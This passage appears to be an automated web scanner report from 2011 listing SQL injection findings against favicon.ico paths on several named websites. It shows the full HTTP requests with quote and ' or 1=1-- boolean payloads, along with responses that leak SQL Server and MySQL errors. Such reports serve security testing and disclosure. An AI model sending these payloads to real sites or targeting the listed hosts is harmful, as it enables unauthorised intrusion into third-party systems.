X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=fhuuwaqhnsd0cfemhcqgev45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94639

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string 'Sitemap/index.aspx?404;http://www.aiche.org:80/favicon.ico''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at Sys
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=o3r0yb30w3ot4x45cfuuor55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<head><title>
AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.7. http://www.aiche.org/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aiche.org
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=uw5fjq55xit21l55sew1sn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94608

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Incorrect syntax near '='.
Unclosed quotation mark after the character string ''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlExcepti
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=ulrrd555uggy1qfzv4z5jr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<head><title>
AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.8. http://www.amateurfarm.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.amateurfarm.net
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 63872318'%20or%201%3d1--%20 and 63872318'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico63872318'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 534
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico63872318' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico63872318'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 530
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico63872318' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.9. http://www.amateurfarm.net/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.amateurfarm.net
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10480672%20or%201%3d1--%20 and 10480672%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?110480672%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 515
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico?110480672%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 511
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.10. http://www.divorcemag.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.divorcemag.com
Path:	/favicon.ico

Issue detail

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=354213325c0864e086f273119a41caa9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=96638fd64097146eda9c1968b6ecdd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.11. http://www.divorcemag.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.divorcemag.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=eb5be03b0b19be852962b628233873e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=9f178e93370297b3301f3e79fb144831; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.12. http://www.edison.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.edison.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.edison.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:26:11 GMT
Content-Length: 760
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSTBBRAT=PGCIEEICALMNEGGIBIDNCKFA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML dir=ltr>
<HEAD>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
...[SNIP]...
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'favicon.ico''.</font>
...[SNIP]...

1.13. http://www.expertsatellite.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.expertsatellite.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12342703%20or%201%3d1--%20 and 12342703%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?112342703%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77beaa1c0"
Last-Modified: Thu, 22 Jul 2010 10:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

Request 2

GET /favicon.ico?112342703%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77af67dc0"
Last-Modified: Thu, 22 Jul 2010 10:35:43 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

1.14. http://www.infiniti.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.infiniti.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382271'%20or%201%3d1--%20 and 15382271'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico15382271'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:09 GMT
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference #3.66ce8f18.1304421909.372a7dbb
</BODY></HTML>

Request 2

GET /favicon.ico15382271'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Content-Length: 1443
Content-Type: text/html;charset=UTF-8
Date: Tue, 03 May 2011 11:25:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="expires" content="never">
   <meta http-equiv="CACHE-CONTROL" content="PUBLIC">
   <meta name="Copyright" content="Infiniti Global">
   <meta name="Designer" content="Infiniti Global">
   <meta name="Publisher" content="Infiniti Global">
   <meta name="Revisit-After" content="15 days">
   <meta name="distribution" content="Local">
   <meta name="Robots" content="INDEX,FOLLOW">
   <meta name="MSSmartTagsPreventParsing" content="TRUE">
   <meta name="author" content="Infiniti Global">

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <title>Not Found</title>

   <script type="text/javascript" src="/static/scripts/s_code.js"></script>

   <link rel="stylesheet" type="text/css" href="/static/media/styles/reset.css">
   <link rel="stylesheet" type="text/css" href="/static/media/styles/site.css">
</head>
   <body class="noscript">
       <div id="flashcontent">
           <h1 id="header-logo">Infiniti</h1>
           <div id="wrapper">
               <h1>Not found</h1>
               <p>The page you have requested was not found.</p>
               <p>You may have clicked an expired link or mistyped the address.</p>
           </div>
       </div>
       <script type="text/script">
           s.pageType = 'errorPage';
           var s_code=s.t();
           if(s_code) document.write(s_code);
       </script>
   </body>
</html>

1.15. http://www.infiniti.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.infiniti.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19896265%20or%201%3d1--%20 and 19896265%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?119896265%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 500 Internal Server Error
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 284
Expires: Tue, 03 May 2011 11:25:03 GMT
Date: Tue, 03 May 2011 11:25:03 GMT
Connection: close

<HTML><HEAD>
<TITLE>Internal Server Error</TITLE>
</HEAD><BODY>
<H1>Internal Server Error - Read</H1>
The server encountered an internal error or misconfiguration and was unable to
complete your request.<P>
Reference #3.66ce8f18.1304421903.372a797f
</BODY></HTML>

Request 2

GET /favicon.ico?119896265%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infiniti.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Win32) Communique/4.0.1 mod_jk/1.2.28
Last-Modified: Thu, 30 Jul 2009 21:49:47 GMT
ETag: "3cea-57e-484a594f"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: image/x-icon
Date: Tue, 03 May 2011 11:25:04 GMT
Connection: close

..............h.......(....... ...........@...................................RQQ.311.........gff.........wvv......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
................... ..... ..... .. .............................
....
....
................

.....................................................................................................................................

1.16. http://www.lvhn.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lvhn.org
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9c1a7a3fa55a51b4b0a14529df464a4b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 209
Vary: User-Agent

invalid query:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/favicon.ico'' and a.template_id = b.template_id' at line 1

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lvhn.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:14 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=eeb38462e2017f6127c166bb113704f4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Vary: User-Agent
Content-Length: 37376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Comp
...[SNIP]...

1.17. http://www.mailfromftd.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.mailfromftd.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21410475'%20or%201%3d1--%20 and 21410475'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico21410475'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 437988272
Age: 13
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 437988272</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /favicon.ico21410475'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailfromftd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com
Set-Cookie: TLTUID=8619F46E75781075002383DB220F9615; Path=/; Domain=.mailfromftd.com; expires=Tue, 03-05-2021 11:28:52 GMT
Location: http://www.ftd.com/error.epl
Content-Type: text/html; charset=iso-8859-1
Content-Length: 347
Date: Tue, 03 May 2011 11:28:52 GMT
X-Varnish: 628702974
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/error.epl">here</A>.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</BODY></HTML>

1.18. http://www.nativeoutdoors.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.nativeoutdoors.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96460785'%20or%201%3d1--%20 and 96460785'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico96460785'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
